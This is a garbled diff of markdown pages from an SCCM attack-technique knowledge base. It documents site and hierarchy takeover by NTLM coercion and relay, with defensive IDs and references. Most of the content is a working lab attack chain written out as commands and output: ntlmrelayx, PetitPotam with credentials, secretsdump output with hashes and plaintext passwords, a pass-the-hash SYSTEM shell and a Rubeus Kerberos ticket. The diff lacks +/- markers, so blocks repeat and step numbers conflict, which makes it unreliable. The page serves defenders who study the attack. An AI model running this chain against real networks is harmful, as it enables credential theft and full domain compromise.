The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
## Defensive IDs
- [PREVENT-2: Disable Fallback to NTLM](../../../defense-techniques/PREVENT/PREVENT-2/prevent-2_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-2/prevent-2_description.md)
- [PREVENT-14: Require Extended Protection for Authentication (EPA) on AD CS CAs and standalone site databases](../../../defense-techniques/PREVENT/PREVENT-14/prevent-14_description.md)
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [PREVENT-14: Require EPA on AD CS and site databases](../../../defense-techniques/PREVENT/PREVENT-14/prevent-14_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-1.1: Coerce primary site server
@@ -191,9 +186,8 @@ The steps to execute TAKEOVER-1.1 through TAKEOVER-1.3 are the same except that
## References
- Chris Thompson, SCCM Site Takeover via Automatic Client Push Installation, https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1
- Chris Thompson, SCCM Hierarchy Takeover: One Site to Rule Them All, https://posts.specterops.io/sccm-hierarchy-takeover-41929c61e087
- Garrett Foster, SCCM Hierarchy Takeover with High Availability, https://posts.specterops.io/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43
- Garrett Foster, sccmhunter, https://github.com/garrettfoster13/sccmhunter
- Chris Thompson, SharpSCCM, https://github.com/Mayyhem/SharpSCCM
- Chris Thompson, [SCCM Site Takeover via Automatic Client Push Installation](https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1)
- Chris Thompson, [SCCM Hierarchy Takeover: One Site to Rule Them All](https://posts.specterops.io/sccm-hierarchy-takeover-41929c61e087)
- Garrett Foster, [SCCM Hierarchy Takeover with High Availability](https://posts.specterops.io/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43)
- Garrett Foster, [sccmhunter](https://github.com/garrettfoster13/sccmhunter)
- Chris Thompson, [SharpSCCM](https://github.com/Mayyhem/SharpSCCM)
@@ -1,4 +1,5 @@
# TAKEOVER-2
## Description
Hierarchy takeover via NTLM coercion and relay to SMB on remote site database
@@ -23,8 +24,7 @@ Hierarchy takeover via NTLM coercion and relay to SMB on remote site database
- `LmCompatibilityLevel` < `5` or not present, or = `5` and LmCompatibilityLevel >= `3` on the coercion target
### Relay
- Connectivity from the relay server to SMB (TCP/445) on the relay target, the site database
- Connectivity from the relay server to MSSQL (TCP/1433) on the relay target, the site database
- Connectivity from the relay server to SMB (TCP/445) on the relay target, the site database
- Relay target settings:
- `RequireSecuritySignature` = `0` or not present
- `RestrictReceivingNTLMTraffic` = `0` or not present
@@ -33,16 +33,20 @@ Hierarchy takeover via NTLM coercion and relay to SMB on remote site database
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
By default, the Active Directory domain computer accounts for primary site servers (including CAS site servers) and passive site servers are granted membership in their respective site database server's local Administrators group. An attacker who is able to successfully coerce NTLM authentication from one of these accounts and relay it to the site database server via SMB can use these permissions to access the system and database, then grant an arbitrary domain account the SCCM "Full Administrator" role.
## Impact
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
## Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-2.1: Coerce primary site server
- TAKEOVER-2.2: Coerce passive site server
## Defensive IDs
- [PREVENT-1: Patch SCCM Site Server with KB15599094](../defense-techniques/PREVENT/PREVENT-1/prevent-1_description.md)
## Examples
The steps to execute TAKEOVER-2.1 and TAKEOVER-2.2 are the same except that a different system is targeted for coercion of NTLM authentication.
@@ -50,518 +54,421 @@ The steps to execute TAKEOVER-2.1 and TAKEOVER-2.2 are the same except that a di
1. On the attacker relay server, start `ntlmrelayx`, targeting the IP address of the site database server and starting a SOCKS proxy:
```
└─# ntlmrelayx.py -t smb://10.10.100.8 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
```
└─# ntlmrelayx.py -t smb://10.10.100.8 -socks -smb2support
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening on 127.0.0.1:1080
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>
```
2. Coerce authentication from the site server's domain computer account:
```
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 sccm.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:sccm.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
```
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 sccm.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:sccm.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
Observe that a connection is received on the relay server and a SOCKS proxy the site database server is started with the relayed credentials:
Observe that a connection is received on the relay server and a SOCKS proxy the site database server is started with the relayed credentials:
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.8
[*] Authenticating against smb://10.10.100.8 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.8(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ----------- --------- ----------- ----
SMB 10.10.100.8 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
```
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.9, attacking target smb://10.10.100.8
[*] Authenticating against smb://10.10.100.8 as LAB/SCCM$ SUCCEED
[*] SOCKS: Adding LAB/SCCM$@10.10.100.8(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.9 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ----------- --------- ----------- ----
SMB 10.10.100.8 LAB/SCCM$ TRUE 445
ntlmrelayx>
```
3. Proxy in secretsdump to obtain credentials for the MSSQL database, which may be running as `LocalSystem` or a domain service account:
```
└─# proxychains secretsdump.py 'lab/sccm$@10.10.100.8' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
```
└─# proxychains secretsdump.py 'lab/sccm$@10.10.100.8' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.57.31:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc572...b524
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19c...ef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6...89c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6...089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:2b07...31bd:::
[*] Dumping cached domain logon information (domain/username:hash)
MAYYHEM.LOCAL/sccmadmin:$DCC2$10240#sccmadmin#9c5f...8b48: (2024-02-29 18:49:56)
MAYYHEM.LOCAL/Administrator:$DCC2$10240#Administrator#dfb3...dc42: (2024-02-24 18:21:18)
MAYYHEM.LOCAL/sqlsvc:$DCC2$10240#sqlsvc#e1286...346c: (2024-03-01 17:23:29)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MAYYHEM\SITE3-DB$:aes256-cts-hmac-sha1-96:0079...ba03
MAYYHEM\SITE3-DB$:aes128-cts-hmac-sha1-96:2d8e...3068
MAYYHEM\SITE3-DB$:des-cbc-md5:83f1...7ca4
MAYYHEM\SITE3-DB$:plain_password_hex:6100...6d00
MAYYHEM\SITE3-DB$:aad3b435b51404eeaad3b435b51404ee:1eca...baf0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf470...4a44
dpapi_userkey:0x09f0....7fcf
[*] NL$KM
...
NL$KM:2978...b0c1
[*] _SC_MSSQLSERVER
MAYYHEM\sqlsvc:P@ssw0rd
[*] _SC_SQLSERVERAGENT
MAYYHEM\sqlsvc:P@ssw0rd
[*] Cleaning up...
[*] Stopping service RemoteRegistry
```
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.57.31:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc572...b524
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19c...ef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6...89c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6...089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:2b07...31bd:::
[*] Dumping cached domain logon information (domain/username:hash)
MAYYHEM.LOCAL/sccmadmin:$DCC2$10240#sccmadmin#9c5f...8b48: (2024-02-29 18:49:56)
MAYYHEM.LOCAL/Administrator:$DCC2$10240#Administrator#dfb3...dc42: (2024-02-24 18:21:18)
MAYYHEM.LOCAL/sqlsvc:$DCC2$10240#sqlsvc#e1286...346c: (2024-03-01 17:23:29)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MAYYHEM\SITE3-DB$:aes256-cts-hmac-sha1-96:0079...ba03
MAYYHEM\SITE3-DB$:aes128-cts-hmac-sha1-96:2d8e...3068
MAYYHEM\SITE3-DB$:des-cbc-md5:83f1...7ca4
MAYYHEM\SITE3-DB$:plain_password_hex:6100...6d00
MAYYHEM\SITE3-DB$:aad3b435b51404eeaad3b435b51404ee:1eca...baf0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf470...4a44
dpapi_userkey:0x09f0....7fcf
[*] NL$KM
...
NL$KM:2978...b0c1
[*] _SC_MSSQLSERVER
MAYYHEM\sqlsvc:P@ssw0rd
[*] _SC_SQLSERVERAGENT
MAYYHEM\sqlsvc:P@ssw0rd
[*] Cleaning up...
[*] Stopping service RemoteRegistry
```
5. Get a shell/agent on the system as SYSTEM:
4. Get a shell/agent on the system as SYSTEM:
```
```
impacket-smbexec Administrator@SITE3-DB.MAYYHEM.LOCAL -hashes ad3b435b51404eeaad3b435b51404ee:e19c...ef42
Impacket v0.11.0 - Copyright 2023 Fortra
impacket-smbexec Administrator@SITE3-DB.MAYYHEM.LOCAL -hashes ad3b435b51404eeaad3b435b51404ee:e19c...ef42
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
```
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
```
At this point, if the service is running in the context of `LocalSystem`, you can access the database to grant a user the `Full Administrator` role (see TAKEOVER-1). If the database is running in the context of a domain service account, further steps are needed.
At this point, if the service is running in the context of `LocalSystem`, you can access the database to grant a user the `Full Administrator` role (see TAKEOVER-1). If the database is running in the context of a domain service account, further steps are needed.
5. Identify the account running the sqlservr.exe service. In this example, the site database is running in the context of `MAYYHEM\sqlsvc`:
6. Identify the account running the sqlservr.exe service. In this example, the site database is running in the context of `MAYYHEM\sqlsvc`:
```
tasklist /v
```
tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 0:12:41 N/A
...
sqlservr.exe 4776 Services 0 253,152 K Unknown MAYYHEM\sqlsvc 0:00:01 N/A
...
conhost.exe 2980 Services 0 12,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 4908 Services 0 8,800 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
```
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 0:12:41 N/A
System 4 Services 0 148 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A
Registry 100 Services 0 75,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
smss.exe 304 Services 0 1,276 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 432 Services 0 6,196 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
wininit.exe 532 Services 0 6,956 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 540 Console 1 5,796 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 604 Console 1 11,036 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 660 Services 0 9,396 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
lsass.exe 680 Services 0 18,508 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 776 Services 0 14,552 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
fontdrvhost.exe 804 Services 0 3,460 K Unknown Font Driver Host\UMFD-0 0:00:00 N/A
fontdrvhost.exe 812 Console 1 3,372 K Unknown Font Driver Host\UMFD-1 0:00:00 N/A
svchost.exe 888 Services 0 10,384 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 944 Services 0 7,368 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
LogonUI.exe 1004 Console 1 74,996 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 400 Console 1 121,432 K Unknown Window Manager\DWM-1 0:00:00 N/A
svchost.exe 940 Services 0 5,936 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1028 Services 0 5,412 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1040 Services 0 6,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1060 Services 0 7,712 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1128 Services 0 9,336 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1140 Services 0 6,044 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1148 Services 0 8,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1244 Services 0 7,528 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1268 Services 0 6,680 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1360 Services 0 19,852 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1384 Services 0 7,112 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1540 Services 0 12,660 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1548 Services 0 17,376 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1556 Services 0 11,076 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1676 Services 0 14,992 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1684 Services 0 11,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1696 Services 0 9,220 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1720 Services 0 5,760 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1824 Services 0 10,720 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1856 Services 0 9,288 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1892 Services 0 8,920 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1944 Services 0 8,600 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2020 Services 0 9,808 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1228 Services 0 7,468 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 2096 Services 0 7,732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2212 Services 0 10,400 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2224 Services 0 8,312 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2236 Services 0 7,324 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
spoolsv.exe 2392 Services 0 16,392 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2524 Services 0 5,764 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2552 Services 0 10,260 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 2580 Services 0 27,756 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2640 Services 0 7,084 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 2652 Services 0 5,520 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 2684 Services 0 8,744 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2700 Services 0 12,136 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
sqlwriter.exe 2708 Services 0 8,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2728 Services 0 6,660 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2776 Services 0 5,700 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
VGAuthService.exe 2788 Services 0 11,968 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
vm3dservice.exe 2836 Services 0 6,360 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
vmtoolsd.exe 2848 Services 0 22,816 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
MsMpEng.exe 2864 Services 0 122,044 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 2876 Services 0 28,664 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 2904 Services 0 12,916 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
wlms.exe 2960 Services 0 3,568 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2988 Services 0 10,956 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2068 Services 0 13,024 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
vm3dservice.exe 2376 Console 1 6,488 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AggregatorHost.exe 3452 Services 0 4,596 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dllhost.exe 3500 Services 0 14,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
WmiPrvSE.exe 3716 Services 0 19,176 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:05 N/A
msdtc.exe 3028 Services 0 10,520 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 4312 Services 0 42,920 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4356 Services 0 20,564 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
CcmExec.exe 5076 Services 0 49,404 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
WmiPrvSE.exe 2180 Services 0 10,536 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3596 Services 0 11,388 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
msiexec.exe 2428 Services 0 9,040 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4204 Services 0 10,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4088 Services 0 12,728 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 672 Services 0 5,856 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
sqlservr.exe 4776 Services 0 253,152 K Unknown MAYYHEM\sqlsvc 0:00:01 N/A
WmiPrvSE.exe 560 Services 0 8,956 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
sqlceip.exe 4924 Services 0 18,148 K Unknown NT SERVICE\SQLTELEMETRY 0:00:00 N/A
svchost.exe 4884 Services 0 10,952 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2756 Services 0 13,788 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2760 Services 0 12,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3016 Services 0 6,376 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
WmiPrvSE.exe 2972 Services 0 40,712 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 5036 Services 0 9,384 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4452 Services 0 19,476 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
policyHost.exe 3228 Services 0 13,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
WmiApSrv.exe 1820 Services 0 9,052 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 3668 Services 0 3,932 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 3788 Services 0 4,316 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 2980 Services 0 12,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 4908 Services 0 8,800 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
```
6. Get the SPN for the database service account:
7. Get the SPN for the database service account:
```
setspn -L sqlsvc
Registered ServicePrincipalNames for CN=SQL Service,CN=Users,DC=MAYYHEM,DC=LOCAL:
MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433
MSSQLSvc/SITE3-DB:1433
```
```
setspn -L sqlsvc
Registered ServicePrincipalNames for CN=SQL Service,CN=Users,DC=MAYYHEM,DC=LOCAL:
MSSQLSvc/SITE3-DB.MAYYHEM.LOCAL:1433
MSSQLSvc/SITE3-DB:1433
```
From another Windows system:
From another Windows system:
7. Get a TGT for the SQL service account running the site database:
8. Get a TGT for the SQL service account running the site database:
```
.\Rubeus.exe asktgt /domain:MAYYHEM.LOCAL /user:sqlsvc /password:P@ssw0rd /nowrap
```
.\Rubeus.exe asktgt /domain:MAYYHEM.LOCAL /user:sqlsvc /password:P@ssw0rd /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.0
v2.3.0
[*] Action: Ask TGT
[*] Action: Ask TGT
[*] Using rc4_hmac hash: E19CCF75EE54E06B06A5907AF13CEF42
[*] Building AS-REQ (w/ preauth) for: 'MAYYHEM.LOCAL\sqlsvc'
[*] Using domain controller: 192.168.57.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
[*] Using rc4_hmac hash: E19CCF75EE54E06B06A5907AF13CEF42
[*] Building AS-REQ (w/ preauth) for: 'MAYYHEM.LOCAL\sqlsvc'
[*] Using domain controller: 192.168.57.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFdDCCBXCgAwIBBaEDAgEWooIEiDCCBIRhggSAMIIEfKADAgEFoQ8bDU1BWVlIRU0uTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU1BWVlIRU0uTE9DQUyjggQ+MIIEOqADAgESoQMCAQKiggQsBIIEKLdcg3OmG5/v47h/u/swmeirjidkQJ8ndXG8ENds+MKZLhiKqcT1Q8o37wuZupaj8UZPgIDcwGlXi1cYrnFfvnQvZ8/EWTgMMs9ajk3eDcmyOBINC3mqDy6Cwwfm4jPuuxJpGUVgfBz6j0jabjAXhP0xZfHeBWa+ABUROtQIeaJ5sNT8BJat1nMVi97vBiC9Rxh8JfKypGTqXrcuhaaBmWquTb5I/+2tYfP03Sb22ddfIIKf2dUSf9rjuof6ttlmjrWgtDB8dkGCZYXzghkVCNZ0Jesag2qILMoOBjIDx4I2ijk88iNQmBjOgwJuhRmKoRYZAV03damrWzdY6sWCKtRlMagvOdWwz0NsX3nyV7NR5HSuKXIQzgRWeBYXgHrbEQgB8ga6b2yCOR6cNMuncTRTpkt91tHy7eLBtCHtVeBSTQyxojgKyVvcP2qP++RquYxQ/eOCOIjtp/wSopcudCA447Bm62/JxV3+VMXBvMviPZg0i+rQEgNyfdkE6ZThVRw3hk2oeLij+tCLqN7CPZ5fvbg4Petr3HLtEX7OH0v0xcjBxPGAsgAEh4iarhvkOHDJXrgbvj+40M1Gd3xfiBPXvcp7Lek3ndseuGdUA8B0iy+4QKNVmbkZubJ2OJVhmWJX9WbufcW/nIgh5KTX2RjU4d7clCxc8Zv0ZsjumtSSZHfRKjw3jRUBfjXLAwslMYM7HwwZCpp/+GXZduG8VewugrrUO6DGj87vGohpttjYeCH3+EN/uOOt0Xtz8DbfREwb1OKpS4bstWdyAyzrJm0BLY0Dr0XgG7wcz1WTJ5DWr2h6jHlYsWo4FWNNpB7kmVVhZz18hf+mB75/bqXhgRR4ja4xkqYk